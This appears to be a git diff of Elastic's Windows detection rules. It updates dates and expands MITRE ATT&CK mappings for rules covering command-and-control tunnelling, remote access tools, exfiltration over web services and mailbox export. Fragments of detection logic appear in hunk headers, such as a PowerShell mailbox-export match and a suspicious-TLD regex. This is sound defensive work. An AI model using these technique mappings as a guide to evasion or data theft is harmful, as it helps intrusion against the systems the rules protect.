[[rule.threat.technique.subtechnique]] id = "T1059.001" name = "PowerShell" reference = "https://attack.mitre.org/techniques/T1059/001/" - - [rule.threat.tactic] id = "TA0002" name = "Execution" reference = "https://attack.mitre.org/tactics/TA0002/" - diff --git a/rules/windows/collection_mailbox_export_winlog.toml b/rules/windows/collection_mailbox_export_winlog.toml index 90ae0bf3cf8..d64dc4b3d6e 100644 --- a/rules/windows/collection_mailbox_export_winlog.toml +++ b/rules/windows/collection_mailbox_export_winlog.toml @@ -2,7 +2,7 @@ creation_date = "2023/01/11" integration = ["windows"] maturity = "production" -updated_date = "2026/01/26" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -120,15 +120,22 @@ powershell.file.script_block_text : "New-MailboxExportRequest" and [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1005" name = "Data from Local System" reference = "https://attack.mitre.org/techniques/T1005/" +[[rule.threat.technique]] +id = "T1074" +name = "Data Staged" +reference = "https://attack.mitre.org/techniques/T1074/" + [[rule.threat.technique]] id = "T1114" name = "Email Collection" reference = "https://attack.mitre.org/techniques/T1114/" + [[rule.threat.technique.subtechnique]] id = "T1114.001" name = "Local Email Collection" @@ -139,13 +146,10 @@ id = "T1114.002" name = "Remote Email Collection" reference = "https://attack.mitre.org/techniques/T1114/002/" - - [rule.threat.tactic] id = "TA0009" name = "Collection" reference = "https://attack.mitre.org/tactics/TA0009/" - [rule.investigation_fields] field_names = [ "@timestamp", diff --git a/rules/windows/collection_posh_audio_capture.toml b/rules/windows/collection_posh_audio_capture.toml index 3f922888c59..3f57ec219d6 100644 --- a/rules/windows/collection_posh_audio_capture.toml +++ b/rules/windows/collection_posh_audio_capture.toml @@ -2,7 +2,7 @@ creation_date = "2021/10/19" integration = ["windows"] maturity = "production" -updated_date = "2026/01/26" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -129,39 +129,52 @@ event.category:process and host.os.type:windows and [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1123" name = "Audio Capture" reference = "https://attack.mitre.org/techniques/T1123/" - [rule.threat.tactic] id = "TA0009" name = "Collection" reference = "https://attack.mitre.org/tactics/TA0009/" + [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1059" name = "Command and Scripting Interpreter" reference = "https://attack.mitre.org/techniques/T1059/" + [[rule.threat.technique.subtechnique]] id = "T1059.001" name = "PowerShell" reference = "https://attack.mitre.org/techniques/T1059/001/" - [[rule.threat.technique]] id = "T1106" name = "Native API" reference = "https://attack.mitre.org/techniques/T1106/" - [rule.threat.tactic] id = "TA0002" name = "Execution" reference = "https://attack.mitre.org/tactics/TA0002/" +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1120" +name = "Peripheral Device Discovery" +reference = "https://attack.mitre.org/techniques/T1120/" + +[rule.threat.tactic] +id = "TA0007" +name = "Discovery" +reference = "https://attack.mitre.org/tactics/TA0007/" [rule.investigation_fields] field_names = [ "@timestamp", diff --git a/rules/windows/command_and_control_certreq_postdata.toml b/rules/windows/command_and_control_certreq_postdata.toml index d2af75605fd..e546a3f7a86 100644 --- a/rules/windows/command_and_control_certreq_postdata.toml +++ b/rules/windows/command_and_control_certreq_postdata.toml @@ -2,7 +2,7 @@ creation_date = "2023/01/13" integration = ["endpoint", "windows", "system", "m365_defender", "sentinel_one_cloud_funnel", "crowdstrike"] maturity = "production" -updated_date = "2025/03/20" +updated_date = "2026/03/24" [transform] [[transform.osquery]] @@ -135,38 +135,49 @@ process where host.os.type == "windows" and event.type == "start" and [[rule.threat]] framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1071" +name = "Application Layer Protocol" +reference = "https://attack.mitre.org/techniques/T1071/" + +[[rule.threat.technique.subtechnique]] +id = "T1071.001" +name = "Web Protocols" +reference = "https://attack.mitre.org/techniques/T1071/001/" + [[rule.threat.technique]] id = "T1105" name = "Ingress Tool Transfer" reference = "https://attack.mitre.org/techniques/T1105/" - [rule.threat.tactic] id = "TA0011" name = "Command and Control" reference = "https://attack.mitre.org/tactics/TA0011/" + [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1218" name = "System Binary Proxy Execution" reference = "https://attack.mitre.org/techniques/T1218/" - [rule.threat.tactic] id = "TA0005" name = "Defense Evasion" reference = "https://attack.mitre.org/tactics/TA0005/" + [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1567" name = "Exfiltration Over Web Service" reference = "https://attack.mitre.org/techniques/T1567/" - [rule.threat.tactic] id = "TA0010" name = "Exfiltration" reference = "https://attack.mitre.org/tactics/TA0010/" - diff --git a/rules/windows/command_and_control_common_webservices.toml b/rules/windows/command_and_control_common_webservices.toml index 0c00e93c80e..cb304b5211b 100644 --- a/rules/windows/command_and_control_common_webservices.toml +++ b/rules/windows/command_and_control_common_webservices.toml @@ -2,7 +2,7 @@ creation_date = "2020/11/04" integration = ["endpoint", "sentinel_one_cloud_funnel"] maturity = "production" -updated_date = "2026/03/12" +updated_date = "2026/03/24" [transform] [[transform.investigate]] @@ -339,33 +339,57 @@ network where host.os.type == "windows" and [[rule.threat]] framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1071" +name = "Application Layer Protocol" +reference = "https://attack.mitre.org/techniques/T1071/" + +[[rule.threat.technique.subtechnique]] +id = "T1071.001" +name = "Web Protocols" +reference = "https://attack.mitre.org/techniques/T1071/001/" + +[[rule.threat.technique]] +id = "T1090" +name = "Proxy" +reference = "https://attack.mitre.org/techniques/T1090/" + +[[rule.threat.technique.subtechnique]] +id = "T1090.002" +name = "External Proxy" +reference = "https://attack.mitre.org/techniques/T1090/002/" + [[rule.threat.technique]] id = "T1102" name = "Web Service" reference = "https://attack.mitre.org/techniques/T1102/" +[[rule.threat.technique.subtechnique]] +id = "T1102.001" +name = "Dead Drop Resolver" +reference = "https://attack.mitre.org/techniques/T1102/001/" + +[[rule.threat.technique.subtechnique]] +id = "T1102.002" +name = "Bidirectional Communication" +reference = "https://attack.mitre.org/techniques/T1102/002/" + [[rule.threat.technique]] id = "T1568" name = "Dynamic Resolution" reference = "https://attack.mitre.org/techniques/T1568/" + [[rule.threat.technique.subtechnique]] id = "T1568.002" name = "Domain Generation Algorithms" reference = "https://attack.mitre.org/techniques/T1568/002/" -[[rule.threat.technique]] -id = "T1090" -name = "Proxy" -reference = "https://attack.mitre.org/techniques/T1090/" -[[rule.threat.technique.subtechnique]] -id = "T1090.002" -name = "External Proxy" -reference = "https://attack.mitre.org/techniques/T1090/002/" - [rule.threat.tactic] id = "TA0011" name = "Command and Control" reference = "https://attack.mitre.org/tactics/TA0011/" + [[rule.threat]] framework = "MITRE ATT&CK" @@ -373,6 +397,7 @@ framework = "MITRE ATT&CK" id = "T1567" name = "Exfiltration Over Web Service" reference = "https://attack.mitre.org/techniques/T1567/" + [[rule.threat.technique.subtechnique]] id = "T1567.001" name = "Exfiltration to Code Repository" @@ -383,10 +408,12 @@ id = "T1567.002" name = "Exfiltration to Cloud Storage" reference = "https://attack.mitre.org/techniques/T1567/002/" - +[[rule.threat.technique.subtechnique]] +id = "T1567.003" +name = "Exfiltration to Text Storage Sites" +reference = "https://attack.mitre.org/techniques/T1567/003/" [rule.threat.tactic] id = "TA0010" name = "Exfiltration" reference = "https://attack.mitre.org/tactics/TA0010/" - diff --git a/rules/windows/command_and_control_dns_susp_tld.toml b/rules/windows/command_and_control_dns_susp_tld.toml index f4611ddfc9f..389874743d4 100644 --- a/rules/windows/command_and_control_dns_susp_tld.toml +++ b/rules/windows/command_and_control_dns_susp_tld.toml @@ -2,7 +2,7 @@ creation_date = "2025/08/20" integration = ["endpoint", "windows", "sentinel_one_cloud_funnel", "crowdstrike"] maturity = "production" -updated_date = "2025/09/18" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -87,19 +87,41 @@ dns.question.name regex """.*\.(top|buzz|xyz|rest|ml|cf|gq|ga|onion|monster|cyou [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1071" name = "Application Layer Protocol" reference = "https://attack.mitre.org/techniques/T1071/" + [[rule.threat.technique.subtechnique]] id = "T1071.004" name = "DNS" reference = "https://attack.mitre.org/techniques/T1071/004/" - [rule.threat.tactic] id = "TA0011" name = "Command and Control" reference = "https://attack.mitre.org/tactics/TA0011/" +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1127" +name = "Trusted Developer Utilities Proxy Execution" +reference = "https://attack.mitre.org/techniques/T1127/" + +[[rule.threat.technique.subtechnique]] +id = "T1127.001" +name = "MSBuild" +reference = "https://attack.mitre.org/techniques/T1127/001/" +[[rule.threat.technique]] +id = "T1218" +name = "System Binary Proxy Execution" +reference = "https://attack.mitre.org/techniques/T1218/" + +[rule.threat.tactic] +id = "TA0005" +name = "Defense Evasion" +reference = "https://attack.mitre.org/tactics/TA0005/" diff --git a/rules/windows/command_and_control_iexplore_via_com.toml b/rules/windows/command_and_control_iexplore_via_com.toml index a9db0f9e470..f04720d6889 100644 --- a/rules/windows/command_and_control_iexplore_via_com.toml +++ b/rules/windows/command_and_control_iexplore_via_com.toml @@ -2,7 +2,7 @@ creation_date = "2020/11/28" integration = ["endpoint"] maturity = "production" -updated_date = "2025/01/15" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -89,31 +89,59 @@ Internet Explorer can be manipulated via the Component Object Model (COM) to ini [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1071" name = "Application Layer Protocol" reference = "https://attack.mitre.org/techniques/T1071/" +[[rule.threat.technique.subtechnique]] +id = "T1071.004" +name = "DNS" +reference = "https://attack.mitre.org/techniques/T1071/004/" [rule.threat.tactic] id = "TA0011" name = "Command and Control" reference = "https://attack.mitre.org/tactics/TA0011/" + [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1559" name = "Inter-Process Communication" reference = "https://attack.mitre.org/techniques/T1559/" + [[rule.threat.technique.subtechnique]] id = "T1559.001" name = "Component Object Model" reference = "https://attack.mitre.org/techniques/T1559/001/" - - [rule.threat.tactic] id = "TA0002" name = "Execution" reference = "https://attack.mitre.org/tactics/TA0002/" +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1218" +name = "System Binary Proxy Execution" +reference = "https://attack.mitre.org/techniques/T1218/" + +[[rule.threat.technique.subtechnique]] +id = "T1218.010" +name = "Regsvr32" +reference = "https://attack.mitre.org/techniques/T1218/010/" + +[[rule.threat.technique.subtechnique]] +id = "T1218.011" +name = "Rundll32" +reference = "https://attack.mitre.org/techniques/T1218/011/" + +[rule.threat.tactic] +id = "TA0005" +name = "Defense Evasion" +reference = "https://attack.mitre.org/tactics/TA0005/" diff --git a/rules/windows/command_and_control_multiple_rmm_vendors_same_host.toml b/rules/windows/command_and_control_multiple_rmm_vendors_same_host.toml index 8a0b48ac497..6effc3fefe1 100644 --- a/rules/windows/command_and_control_multiple_rmm_vendors_same_host.toml +++ b/rules/windows/command_and_control_multiple_rmm_vendors_same_host.toml @@ -9,7 +9,7 @@ integration = [ "crowdstrike", ] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -195,15 +195,22 @@ from logs-endpoint.events.process-*, endgame-*, logs-crowdstrike.fdr*, logs-m365 [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1219" name = "Remote Access Tools" reference = "https://attack.mitre.org/techniques/T1219/" + [[rule.threat.technique.subtechnique]] id = "T1219.002" name = "Remote Desktop Software" reference = "https://attack.mitre.org/techniques/T1219/002/" +[[rule.threat.technique.subtechnique]] +id = "T1219.003" +name = "Remote Access Hardware" +reference = "https://attack.mitre.org/techniques/T1219/003/" + [rule.threat.tactic] id = "TA0011" name = "Command and Control" diff --git a/rules/windows/command_and_control_new_terms_commonly_abused_rmm.toml b/rules/windows/command_and_control_new_terms_commonly_abused_rmm.toml index 04953eaf7da..6d26994f276 100644 --- a/rules/windows/command_and_control_new_terms_commonly_abused_rmm.toml +++ b/rules/windows/command_and_control_new_terms_commonly_abused_rmm.toml @@ -2,7 +2,7 @@ creation_date = "2023/04/03" integration = ["endpoint", "windows", "system"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -493,20 +493,31 @@ host.os.type: "windows" and [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1219" name = "Remote Access Tools" reference = "https://attack.mitre.org/techniques/T1219/" + +[[rule.threat.technique.subtechnique]] +id = "T1219.001" +name = "IDE Tunneling" +reference = "https://attack.mitre.org/techniques/T1219/001/" + [[rule.threat.technique.subtechnique]] id = "T1219.002" name = "Remote Desktop Software" reference = "https://attack.mitre.org/techniques/T1219/002/" +[[rule.threat.technique.subtechnique]] +id = "T1219.003" +name = "Remote Access Hardware" +reference = "https://attack.mitre.org/techniques/T1219/003/" + [rule.threat.tactic] id = "TA0011" name = "Command and Control" reference = "https://attack.mitre.org/tactics/TA0011/" - [rule.new_terms] field = "new_terms_fields" value = ["host.id"] diff --git a/rules/windows/command_and_control_outlook_home_page.toml b/rules/windows/command_and_control_outlook_home_page.toml index e584f93e7a1..c4997d4fbd7 100644 --- a/rules/windows/command_and_control_outlook_home_page.toml +++ b/rules/windows/command_and_control_outlook_home_page.toml @@ -2,7 +2,7 @@ creation_date = "2024/08/01" integration = ["endpoint", "windows", "m365_defender", "sentinel_one_cloud_funnel", "crowdstrike"] maturity = "production" -updated_date = "2025/09/11" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -97,21 +97,26 @@ framework = "MITRE ATT&CK" id = "TA0011" name = "Command and Control" reference = "https://attack.mitre.org/tactics/TA0011/" + [[rule.threat]] framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1112" +name = "Modify Registry" +reference = "https://attack.mitre.org/techniques/T1112/" + [[rule.threat.technique]] id = "T1137" name = "Office Application Startup" reference = "https://attack.mitre.org/techniques/T1137/" + [[rule.threat.technique.subtechnique]] id = "T1137.004" name = "Outlook Home Page" reference = "https://attack.mitre.org/techniques/T1137/004/" - - [rule.threat.tactic] id = "TA0003" name = "Persistence" reference = "https://attack.mitre.org/tactics/TA0003/" - diff --git a/rules/windows/command_and_control_port_forwarding_added_registry.toml b/rules/windows/command_and_control_port_forwarding_added_registry.toml index 0e73d7b7ab7..51b0f50b658 100644 --- a/rules/windows/command_and_control_port_forwarding_added_registry.toml +++ b/rules/windows/command_and_control_port_forwarding_added_registry.toml @@ -2,7 +2,7 @@ creation_date = "2020/11/25" integration = ["endpoint", "windows", "sentinel_one_cloud_funnel", "m365_defender", "crowdstrike"] maturity = "production" -updated_date = "2025/08/26" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -95,26 +95,36 @@ registry where host.os.type == "windows" and event.type == "change" and [[rule.threat]] framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1090" +name = "Proxy" +reference = "https://attack.mitre.org/techniques/T1090/" + +[[rule.threat.technique.subtechnique]] +id = "T1090.001" +name = "Internal Proxy" +reference = "https://attack.mitre.org/techniques/T1090/001/" + [[rule.threat.technique]] id = "T1572" name = "Protocol Tunneling" reference = "https://attack.mitre.org/techniques/T1572/" - [rule.threat.tactic] id = "TA0011" name = "Command and Control" reference = "https://attack.mitre.org/tactics/TA0011/" + [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1112" name = "Modify Registry" reference = "https://attack.mitre.org/techniques/T1112/" - [rule.threat.tactic] id = "TA0005" name = "Defense Evasion" reference = "https://attack.mitre.org/tactics/TA0005/" - diff --git a/rules/windows/command_and_control_rdp_tunnel_plink.toml b/rules/windows/command_and_control_rdp_tunnel_plink.toml index 14e373d6b5f..b3e6cdf4098 100644 --- a/rules/windows/command_and_control_rdp_tunnel_plink.toml +++ b/rules/windows/command_and_control_rdp_tunnel_plink.toml @@ -2,7 +2,7 @@ creation_date = "2020/10/14" integration = ["endpoint", "windows", "sentinel_one_cloud_funnel", "m365_defender", "system", "crowdstrike"] maturity = "production" -updated_date = "2025/03/20" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -91,31 +91,36 @@ process where host.os.type == "windows" and event.type == "start" and [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1572" name = "Protocol Tunneling" reference = "https://attack.mitre.org/techniques/T1572/" - [rule.threat.tactic] id = "TA0011" name = "Command and Control" reference = "https://attack.mitre.org/tactics/TA0011/" + [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1021" name = "Remote Services" reference = "https://attack.mitre.org/techniques/T1021/" + +[[rule.threat.technique.subtechnique]] +id = "T1021.001" +name = "Remote Desktop Protocol" +reference = "https://attack.mitre.org/techniques/T1021/001/" + [[rule.threat.technique.subtechnique]] id = "T1021.004" name = "SSH" reference = "https://attack.mitre.org/techniques/T1021/004/" - - [rule.threat.tactic] id = "TA0008" name = "Lateral Movement" reference = "https://attack.mitre.org/tactics/TA0008/" - diff --git a/rules/windows/command_and_control_remcos_rat_iocs.toml b/rules/windows/command_and_control_remcos_rat_iocs.toml index e7563a52d20..9b9784c5f2c 100644 --- a/rules/windows/command_and_control_remcos_rat_iocs.toml +++ b/rules/windows/command_and_control_remcos_rat_iocs.toml @@ -2,7 +2,7 @@ creation_date = "2025/08/20" integration = ["endpoint", "windows", "sentinel_one_cloud_funnel", "m365_defender", "system"] maturity = "production" -updated_date = "2025/08/20" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -91,14 +91,49 @@ any where host.os.type == "windows" and [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1219" name = "Remote Access Tools" reference = "https://attack.mitre.org/techniques/T1219/" - [rule.threat.tactic] id = "TA0011" name = "Command and Control" reference = "https://attack.mitre.org/tactics/TA0011/" +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1070" +name = "Indicator Removal" +reference = "https://attack.mitre.org/techniques/T1070/" + +[[rule.threat.technique.subtechnique]] +id = "T1070.004" +name = "File Deletion" +reference = "https://attack.mitre.org/techniques/T1070/004/" + +[rule.threat.tactic] +id = "TA0005" +name = "Defense Evasion" +reference = "https://attack.mitre.org/tactics/TA0005/" + +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1547" +name = "Boot or Logon Autostart Execution" +reference = "https://attack.mitre.org/techniques/T1547/" + +[[rule.threat.technique.subtechnique]] +id = "T1547.001" +name = "Registry Run Keys / Startup Folder" +reference = "https://attack.mitre.org/techniques/T1547/001/" + +[rule.threat.tactic] +id = "TA0003" +name = "Persistence" +reference = "https://attack.mitre.org/tactics/TA0003/" diff --git a/rules/windows/command_and_control_remote_file_copy_scripts.toml b/rules/windows/command_and_control_remote_file_copy_scripts.toml index 9042a919ec0..ff5739466cc 100644 --- a/rules/windows/command_and_control_remote_file_copy_scripts.toml +++ b/rules/windows/command_and_control_remote_file_copy_scripts.toml @@ -2,7 +2,7 @@ creation_date = "2020/11/29" integration = ["endpoint", "windows"] maturity = "production" -updated_date = "2026/03/19" +updated_date = "2026/03/24" [transform] [[transform.osquery]] @@ -123,31 +123,36 @@ sequence by host.id, process.entity_id [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1105" name = "Ingress Tool Transfer" reference = "https://attack.mitre.org/techniques/T1105/" - [rule.threat.tactic] id = "TA0011" name = "Command and Control" reference = "https://attack.mitre.org/tactics/TA0011/" + [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1059" name = "Command and Scripting Interpreter" reference = "https://attack.mitre.org/techniques/T1059/" + [[rule.threat.technique.subtechnique]] id = "T1059.005" name = "Visual Basic" reference = "https://attack.mitre.org/techniques/T1059/005/" - +[[rule.threat.technique.subtechnique]] +id = "T1059.007" +name = "JavaScript" +reference = "https://attack.mitre.org/techniques/T1059/007/" [rule.threat.tactic] id = "TA0002" name = "Execution" reference = "https://attack.mitre.org/tactics/TA0002/" - diff --git a/rules/windows/command_and_control_screenconnect_childproc.toml b/rules/windows/command_and_control_screenconnect_childproc.toml index 8ae791c89f0..f7d5966fa87 100644 --- a/rules/windows/command_and_control_screenconnect_childproc.toml +++ b/rules/windows/command_and_control_screenconnect_childproc.toml @@ -2,7 +2,7 @@ creation_date = "2024/03/27" integration = ["endpoint", "windows", "sentinel_one_cloud_funnel", "m365_defender", "system", "crowdstrike"] maturity = "production" -updated_date = "2025/05/05" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -107,14 +107,107 @@ process where host.os.type == "windows" and event.type == "start" and [[rule.threat]] framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1105" +name = "Ingress Tool Transfer" +reference = "https://attack.mitre.org/techniques/T1105/" + [[rule.threat.technique]] id = "T1219" name = "Remote Access Tools" reference = "https://attack.mitre.org/techniques/T1219/" - [rule.threat.tactic] id = "TA0011" name = "Command and Control" reference = "https://attack.mitre.org/tactics/TA0011/" +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1218" +name = "System Binary Proxy Execution" +reference = "https://attack.mitre.org/techniques/T1218/" + +[[rule.threat.technique.subtechnique]] +id = "T1218.005" +name = "Mshta" +reference = "https://attack.mitre.org/techniques/T1218/005/" + +[[rule.threat.technique.subtechnique]] +id = "T1218.007" +name = "Msiexec" +reference = "https://attack.mitre.org/techniques/T1218/007/" + +[[rule.threat.technique.subtechnique]] +id = "T1218.011" +name = "Rundll32" +reference = "https://attack.mitre.org/techniques/T1218/011/" + +[rule.threat.tactic] +id = "TA0005" +name = "Defense Evasion" +reference = "https://attack.mitre.org/tactics/TA0005/" + +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1047" +name = "Windows Management Instrumentation" +reference = "https://attack.mitre.org/techniques/T1047/" + +[[rule.threat.technique]] +id = "T1059" +name = "Command and Scripting Interpreter" +reference = "https://attack.mitre.org/techniques/T1059/" + +[[rule.threat.technique.subtechnique]] +id = "T1059.001" +name = "PowerShell" +reference = "https://attack.mitre.org/techniques/T1059/001/" + +[[rule.threat.technique.subtechnique]] +id = "T1059.003" +name = "Windows Command Shell" +reference = "https://attack.mitre.org/techniques/T1059/003/" + +[[rule.threat.technique.subtechnique]] +id = "T1059.005" +name = "Visual Basic" +reference = "https://attack.mitre.org/techniques/T1059/005/" + +[rule.threat.tactic] +id = "TA0002" +name = "Execution" +reference = "https://attack.mitre.org/tactics/TA0002/" + +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1053" +name = "Scheduled Task/Job" +reference = "https://attack.mitre.org/techniques/T1053/" + +[[rule.threat.technique.subtechnique]] +id = "T1053.005" +name = "Scheduled Task" +reference = "https://attack.mitre.org/techniques/T1053/005/" + +[[rule.threat.technique]] +id = "T1543" +name = "Create or Modify System Process" +reference = "https://attack.mitre.org/techniques/T1543/" + +[[rule.threat.technique.subtechnique]] +id = "T1543.003" +name = "Windows Service" +reference = "https://attack.mitre.org/techniques/T1543/003/" + +[rule.threat.tactic] +id = "TA0003" +name = "Persistence" +reference = "https://attack.mitre.org/tactics/TA0003/" diff --git a/rules/windows/command_and_control_tool_transfer_via_curl.toml b/rules/windows/command_and_control_tool_transfer_via_curl.toml index 760413874e8..e7ad0618aec 100644 --- a/rules/windows/command_and_control_tool_transfer_via_curl.toml +++ b/rules/windows/command_and_control_tool_transfer_via_curl.toml @@ -2,7 +2,7 @@ creation_date = "2025/02/03" integration = ["endpoint", "windows", "system", "m365_defender", "sentinel_one_cloud_funnel", "crowdstrike"] maturity = "production" -updated_date = "2025/08/27" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -108,14 +108,36 @@ process where host.os.type == "windows" and event.type == "start" and [[rule.threat]] framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1071" +name = "Application Layer Protocol" +reference = "https://attack.mitre.org/techniques/T1071/" + +[[rule.threat.technique.subtechnique]] +id = "T1071.001" +name = "Web Protocols" +reference = "https://attack.mitre.org/techniques/T1071/001/" + [[rule.threat.technique]] id = "T1105" name = "Ingress Tool Transfer" reference = "https://attack.mitre.org/techniques/T1105/" - [rule.threat.tactic] id = "TA0011" name = "Command and Control" reference = "https://attack.mitre.org/tactics/TA0011/" +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1567" +name = "Exfiltration Over Web Service" +reference = "https://attack.mitre.org/techniques/T1567/" + +[rule.threat.tactic] +id = "TA0010" +name = "Exfiltration" +reference = "https://attack.mitre.org/tactics/TA0010/" diff --git a/rules/windows/command_and_control_tunnel_cloudflared.toml b/rules/windows/command_and_control_tunnel_cloudflared.toml index 520433f13b9..eb025de67fa 100644 --- a/rules/windows/command_and_control_tunnel_cloudflared.toml +++ b/rules/windows/command_and_control_tunnel_cloudflared.toml @@ -2,7 +2,7 @@ creation_date = "2026/03/18" integration = ["endpoint", "windows", "sentinel_one_cloud_funnel", "m365_defender", "system", "crowdstrike"] maturity = "production" -updated_date = "2026/03/18" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -80,6 +80,17 @@ process where host.os.type == "windows" and event.type == "start" and [[rule.threat]] framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1090" +name = "Proxy" +reference = "https://attack.mitre.org/techniques/T1090/" + +[[rule.threat.technique.subtechnique]] +id = "T1090.002" +name = "External Proxy" +reference = "https://attack.mitre.org/techniques/T1090/002/" + [[rule.threat.technique]] id = "T1572" name = "Protocol Tunneling" diff --git a/rules/windows/command_and_control_tunnel_yuze.toml b/rules/windows/command_and_control_tunnel_yuze.toml index a3a6314cc2e..cd38623397a 100644 --- a/rules/windows/command_and_control_tunnel_yuze.toml +++ b/rules/windows/command_and_control_tunnel_yuze.toml @@ -2,7 +2,7 @@ creation_date = "2026/03/18" integration = ["endpoint", "windows", "sentinel_one_cloud_funnel", "m365_defender", "system", "crowdstrike"] maturity = "production" -updated_date = "2026/03/18" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -86,6 +86,12 @@ process where host.os.type == "windows" and event.type == "start" and [[rule.threat]] framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1090" +name = "Proxy" +reference = "https://attack.mitre.org/techniques/T1090/" + [[rule.threat.technique]] id = "T1572" name = "Protocol Tunneling" @@ -95,3 +101,21 @@ reference = "https://attack.mitre.org/techniques/T1572/" id = "TA0011" name = "Command and Control" reference = "https://attack.mitre.org/tactics/TA0011/" + +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1218" +name = "System Binary Proxy Execution" +reference = "https://attack.mitre.org/techniques/T1218/" + +[[rule.threat.technique.subtechnique]] +id = "T1218.011" +name = "Rundll32" +reference = "https://attack.mitre.org/techniques/T1218/011/" + +[rule.threat.tactic] +id = "TA0005" +name = "Defense Evasion" +reference = "https://attack.mitre.org/tactics/TA0005/" diff --git a/rules/windows/command_and_control_velociraptor_shell_execution.toml b/rules/windows/command_and_control_velociraptor_shell_execution.toml index e3a239e9797..8801cffc6d1 100644 --- a/rules/windows/command_and_control_velociraptor_shell_execution.toml +++ b/rules/windows/command_and_control_velociraptor_shell_execution.toml @@ -2,7 +2,7 @@ creation_date = "2026/03/18" integration = ["endpoint", "windows", "sentinel_one_cloud_funnel", "m365_defender", "system", "crowdstrike"] maturity = "production" -updated_date = "2026/03/18" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -90,10 +90,12 @@ process where host.os.type == "windows" and event.type == "start" and process.co [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1219" name = "Remote Access Tools" reference = "https://attack.mitre.org/techniques/T1219/" + [[rule.threat.technique.subtechnique]] id = "T1219.002" name = "Remote Desktop Software" @@ -104,3 +106,43 @@ id = "TA0011" name = "Command and Control" reference = "https://attack.mitre.org/tactics/TA0011/" +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1218" +name = "System Binary Proxy Execution" +reference = "https://attack.mitre.org/techniques/T1218/" + +[[rule.threat.technique.subtechnique]] +id = "T1218.011" +name = "Rundll32" +reference = "https://attack.mitre.org/techniques/T1218/011/" + +[rule.threat.tactic] +id = "TA0005" +name = "Defense Evasion" +reference = "https://attack.mitre.org/tactics/TA0005/" + +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1059" +name = "Command and Scripting Interpreter" +reference = "https://attack.mitre.org/techniques/T1059/" + +[[rule.threat.technique.subtechnique]] +id = "T1059.001" +name = "PowerShell" +reference = "https://attack.mitre.org/techniques/T1059/001/" + +[[rule.threat.technique.subtechnique]] +id = "T1059.003" +name = "Windows Command Shell" +reference = "https://attack.mitre.org/techniques/T1059/003/" + +[rule.threat.tactic] +id = "TA0002" +name = "Execution" +reference = "https://attack.mitre.org/tactics/TA0002/" diff --git a/rules/windows/credential_access_browsers_unusual_parent.toml b/rules/windows/credential_access_browsers_unusual_parent.toml index 7ba940e2c6d..b02f7744825 100644 --- a/rules/windows/credential_access_browsers_unusual_parent.toml +++ b/rules/windows/credential_access_browsers_unusual_parent.toml @@ -2,7 +2,7 @@ creation_date = "2025/08/27" integration = ["windows", "endpoint", "system", "m365_defender", "sentinel_one_cloud_funnel"] maturity = "production" -updated_date = "2025/08/27" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -108,10 +108,17 @@ process where host.os.type == "windows" and event.type == "start" and [[rule.threat]] 